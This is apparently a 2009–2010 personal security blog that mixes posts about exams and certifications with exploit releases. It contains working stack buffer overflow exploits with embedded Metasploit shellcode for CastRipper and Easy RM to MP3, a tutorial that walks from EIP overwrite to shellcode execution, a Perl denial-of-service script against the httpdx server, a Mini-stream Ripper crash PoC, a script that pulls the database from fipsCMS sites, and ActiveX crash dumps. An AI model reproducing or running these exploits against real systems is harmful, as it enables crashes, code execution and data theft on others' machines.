Schaba's WebLog

After a longtime.

schaba — Tue, 15 Jun 2010 17:43:38 +0000

Hey guys it’s being a long longtime,some of my blog readers might think where i was all these days. well i was away from blogsphere for my degree final year exam.
After completiong of a degree in computer science and commerce applications at Osmania university, i decide make my career as a Network Professional.Though i have completed many courses like CCNA,CCNP,MCSE,MCITP,MCDBA i don’t have any certificate from those vendor’s,to make career in competitive filed of Networking i think its good to get some Certificates which helps validate and prove my experience and knowledge in using different products and solutions. After discussing with some experienced friends in the field of Networking i start with Microsoft MCITP Windows Server 2008 Administrator exam.
Last week successfully i completed all the Necessary exams to get MCITP windows server 2008 Administrator Certificate and now i am Microsoft Certified IT Professional (MCITP) Enterprise Administrator.
And now i am looking forward to do CCNA exam soon.

/schaba

IncrediMail 2.0 ImSpoolU.dll activeX Bug

schaba — Sat, 03 Apr 2010 20:57:34 +0000

while fuzzing incredimail activeX controle i ran into this activeX bug. I don’t have much clue how to exploit it. I know this is really lame.but if anyone else can give me much information about this lemme know. Link to exploit db

Debugging info
————–
Exception Code: ACCESS_VIOLATION
Disasm: 678914AE MOV EDX,[ECX] (ImSpoolU.dll)

Seh Chain:
————————————————–
1 678AE129 ImSpoolU.dll
2 678AE3C0 ImSpoolU.dll
3 678AE6D0 ImSpoolU.dll
4 1682950 VBSCRIPT.dll
5 7C839AD8 KERNEL32.dll

Called From Returns To
————————————————–
ImSpoolU.678914AE 8458BEC

Registers:
————————————————–
EIP 678914AE -> Asc: AUTH
EAX 018BDA90 -> Asc: AUTH
EBX 01C00048 -> 678B83EC
ECX 00000000
EDX 0018A812 -> F00DBAAD
EDI 00000006
ESI 018BDA90 -> Asc: AUTH
EBP 77124C1B -> 8B55FF8B
ESP 0013ED24 -> BFA7C790

Block Disassembly:
————————————————–
6789149C CALL 678A14A0
678914A1 MOV [ESI+4],EAX
678914A4 MOV ESI,[ESI+4]
678914A7 JMP SHORT 678914AB
678914A9 XOR ESI,ESI
678914AB MOV ECX,[EBX+18]
678914AE MOV EDX,[ECX] <--- CRASH
678914B0 MOV EAX,[EDX+18]
678914B3 PUSH 0
678914B5 PUSH EDI
678914B6 PUSH ESI
678914B7 CALL EAX
678914B9 MOV ESI,EAX
678914BB CMP ESI,-1
678914BE JNZ SHORT 678914D2

ArgDump:
--------------------------------------------------
EBP+8 0574C085
EBP+12 D1FC408B
EBP+16 04C25DE8
EBP+20 90909000
EBP+24 FF8B9090
EBP+28 53EC8B55

Stack Dump:
--------------------------------------------------
13ED24 90 C7 A7 BF B8 DA 8B 01 48 00 C0 01 48 00 C0 01 [........H...H...]
13ED34 00 00 00 00 C9 0B 04 80 00 00 00 00 80 ED 13 00 [................]
13ED44 29 E1 8A 67 FF FF FF FF 3A 28 89 67 48 00 C0 01 [...g.......gH...]
13ED54 78 ED 13 00 A4 A6 8B 67 C8 0B 04 80 01 00 00 00 [.......g........]
13ED64 D0 C7 A7 BF 70 50 C0 01 FF FF FF FF 48 00 C0 01 [....pP......H...]

httpdx1.53b(sockets++crash)Dos exploit

schaba — Wed, 24 Feb 2010 17:56:30 +0000

saw this poc for httpdx from exploit db and thought fuzz that program and found a Dos vulnerability in it.
The vulnerability is caused due to an error in multi-socket.This can be exploited to crash the HTTP service.
proof of concept in action
$ ./htppd.pl 192.168.2.1 80
[+] Author : d3b4g
[+] Soft : httpdx1.53b Remote DoS
[+] Sending request…
[-]Done!

exploit code

#!/usr/bin/perl
use IO::Socket;
print "[+] Author : d3b4g\n";
print "[+] Soft   : httpdx1.53b Remote DoS\n";

	if (@ARGV < 1)
		{
 		print "[-] Usage:  
\n";
 		print "[-] Exemple: file.pl 192.168.2.1 80\n";
 		exit;
		}

	$ip 	= $ARGV[0];
	$port 	= $ARGV[1];

print "[+] Sending request...\n";

for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";

	print $socket "GET \x11 HTTP/1.0\n\r\n";
}

Just some updates..

schaba — Mon, 25 Jan 2010 20:04:29 +0000

I published 3 vulnerabilities past days and coudn’t get a time to update.so here it is.

Firefox 3.6 (XML parser) Memory Corruption PoC
Mozilla Firefox 3.6 and earlier 3.0.x versions allows remote attackers to cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.

proof of concept exploit-db

Opera 10.10 (XML parser) Denial of Service

After opening the opera.html browser hang for a while and crush.same bug in firefox too :d
This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.

proof of concept exploit-db

Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC

#!/usr/bin/python
# Tested on: win XPsp3
# webpage: d3b4g.info

#EAX 00E1C880
#EDX 00000001
#EBX 41414141------------------------------------------------
#ESP 000D198C
#EBP 00E1C880          controle over registers
#ESI 41414141------------------------------------------------
#EDI 00E1C880
#EIP 00431302 Ripper.00431302
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 0  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 0  DS 0023 32bit 0(FFFFFFFF)

chars = "A"*90000
crush = "\x41\x41\x41\x41"
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()

proof of concept exploit-db

I found a interesting bug in IE8 while testing my sexy fuzzer which I’m developing, will update it later after digging into it.
That’s all foalk’s

Happy new year

schaba — Wed, 06 Jan 2010 20:04:25 +0000

I learned a lot things in last year lot good stuff,it was one of the best year for me,but the ending was bad and hard to forgot.Anyway good bye to 2009 and welcome to ’10.Hoping this year will be better than last year.

i decide to forgot the bad things happen in last year and look forward.something ended doesn’t mean it’s the end of world right.
some people say everything happen for good,but what happen with me wasn’t happen for good,i lost something that i can’t replace.
This year my resolution is forgot what had happen and look forward for a better future.Anyway i decide to study hard and get good results and hope someday some how i will get what i lost XD

Exam’s are too near so you won’t see much update till it end.

From 0×41414141 to the calc

schaba — Wed, 30 Dec 2009 20:27:47 +0000

Boring days so i just thought write something that will give me some peace.yeahi just wanna show you guys
a quick DEMO of finding a buffer over flow vulnerability and exploit it. err though say its a quick demonstration this take
me some time to write all up.

I recently wrote Bof exploit for caster ripper so i will take it in this demonstration.

Before starting this i wanna tell you guys, to understand what i’m doing in here you gotta have some information about this subject.
and familier with these tools that help me in this process.

I will use thse tools in entire demo

1-Ollydbg (which i find cooler than windbg)

2-Metasploitframework (An awesome tool/framework)

3-Windows Xp installed on vmware

So lets attach the our vulnerable programe to debugger and send our junk data to it and crush it.
Hopefully this small perl script will crush it.
we are sending 5000 x41 which is nothing but 5000 A’s.

my $file= "crush.pls";
my $junk= "\x41" x 5000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

———————————————–
After crushing the CUP registers will look like this.
———————————————–

We can see EIP is overwritten with 41414141 which is AAAAAAA in our buffer.
Great we are now controlling EIP and lets find exact location to place our shell code.

so lets modify our perl script to send another buffer to the programe to crush it.Now we are sending 25000 A’s.

my $file= "crush25000.pls";
my $junk = "\x41" x 25000;
my $junk2 = "\x42" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";

Great now EIP is overwritten with 42424242 which is nothing but BBBBBB. so now we know our buffer size is between 2500 and 3000.

In order to find the exact location, we’ll use Metasploit. I’m going to use windows version of Metasploit
Which is located in C:\program files\metasploit\framwork3

C:\program files\metasploit\framwork3\msf3\tools\pattern_create.rb 5000

It will create unique 5000 patterns.
So lets modify our perl script again.

my $file= "crush25000.pls";
my $junk = "\x41" x 25000;
my $junk2 = "place 5000 characters we created"
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";

So now EIP is overwritten with our unique pattern’s 0x42316b42
lets find the offset of it. Here we go offset is 1076
C:\program files\metasploit\framwork3\msf3\tools\pattern_offset.rb 0x42316b42 5000 1076

Jumping to the shellcode.

Executable modules

Because this is a quick demonstration i won’t go much details about this.To find a JMP address you can use findjmp.c (which you can find from internet, just compile it and run it )

Usage of findjmp ( C:\findjmp kernel32.dll esp)

so i’m going to use this address 0x7D113B1F JMP ESP from SHELL32.dll WinXP SP3. You can replace this with some other address.

so lets write up complete exploit. Thats it XD . Don’t worry i skiped lot stuff in this becox it’s just a demo. lol. peace.

#!/usr/bin/perl
my $file= "d3b4g.pls";
my $junk= "A" x 26076;
my $eip = pack('V',0x7D113B1F);  # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "\x90" x 25;     # NOPs
# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc
\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "pls File Created successfully\n";

CastRipper 2.50 Stack buffer Overflow Exploit

schaba — Sat, 26 Dec 2009 13:03:28 +0000

I wrote this exploit about 3 weeks ago and just send it to exploit DB at offensive security.This Application (CastRipper ) is suffer from stack based buffer overflow

Get it from exploit-db

#!/usr/bin/perl
# CastRipper 2.50.70 (.pls)Stack buffer Overflow Exploit WinXP SP3
# Exploite By : d3b4g
# my webpage www.d3b4g.info
# From tiny islands of maldivies
# Tested on Windows XP SP3
# 24.12.2009
# I used Adress from SHELL32.dll.You can change it to your desired address.Use jmpfind.exe to find address.
print "CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit\n";
print "Exploit By : d3b4g";
my $file= "d3b4g.pls";
my $junk= "A" x 26076;
my $eip = pack('V',0x7D113B1F);  # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "\x90" x 25;     # NOPs

# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "pls File Created successfully\n";

Exploit for Easy RM to MP3

schaba — Sun, 13 Dec 2009 17:50:08 +0000

Last night i was testing available exploits for Easy RM to MP3 converter and unfortunatly non of them work for me. so i decide to write my own exploit for that application.I wrote this exploit under windows XP SP3 and tested it.This application suffer from stack based buffer-overflow.

#
# Exploit for Easy RM to MP3 27.3.700 on  Windows Xp sp3
# By d3b4g
# tested on Windows XP SP3
# version:27.3.700
# Date:22.12.09
# From tiny islands of maldivies
#
my $file= "d3b4g.m3u";

my $junk= "A" x 26071;
my $eip = pack('V',0x7C836A08);  #jmp esp from  kernel32.dll
my $shellcode = "\x90" x 30;

# windows/exec - 144 bytes
#  Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Get it from exploit-db

fipsCMS Light 2.1 Database Disclosure Exploit

schaba — Sun, 06 Dec 2009 09:11:01 +0000

I wrote this a long time ago and thought post here.Link to packetstormsecurity

#!/usr/bin/perl
#
# fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit
#
# Exploit by d3b4g
# script:http://fipsasp.com
# Demo: http://demo.fipsasp.com/fipsCMS_light/_fipsdb/db.mdb
# From Tiny little island of maldivies
use LWP::Simple;
use LWP::UserAgent;

print "\fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit *\n";
print "\t*                  by d3b4g                                    *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.vuln.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting to Server ......\n\n");
sleep(5);
$database = "mdb-database/fipsdb/db.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$sploit=get $exploit;
if($sploit){
print("..........................downloading db...........................\n");
print("$sploit\n");
}
else {
help();
exit;
}

waiting for this book

schaba — Mon, 02 Nov 2009 04:47:43 +0000

Publisher Description

Python is fast becoming the programming language of choice for hackers, reverse engineers, and software testers because it’s easy to write quickly, and it has the low-level support and libraries that make hackers happy. But until now, there has been no real manual on how to use Python for a variety of hacking tasks. You had to dig through forum posts and man pages, endlessly tweaking your own code to get everything working. Not anymore.

Gray Hat Python explains the concepts behind hacking tools and techniques like debuggers, trojans, fuzzers, and emulators. But author Justin Seitz goes beyond theory, showing you how to harness existing Python-based security tools – and how to build your own when the pre-built ones won’t cut it.
……………
As this book is not available in local book stores today I ordered it from amazon . I already got 2nd chapter of this book DEBUGGERS AND DEBUGGER DESIGN its with lot of information about how to code your own python based debugger and whats going on a windows based debugger.So i think it’s worth to spend $30 on this book.Anyway sure enough this will give me lot of information i don’t know before.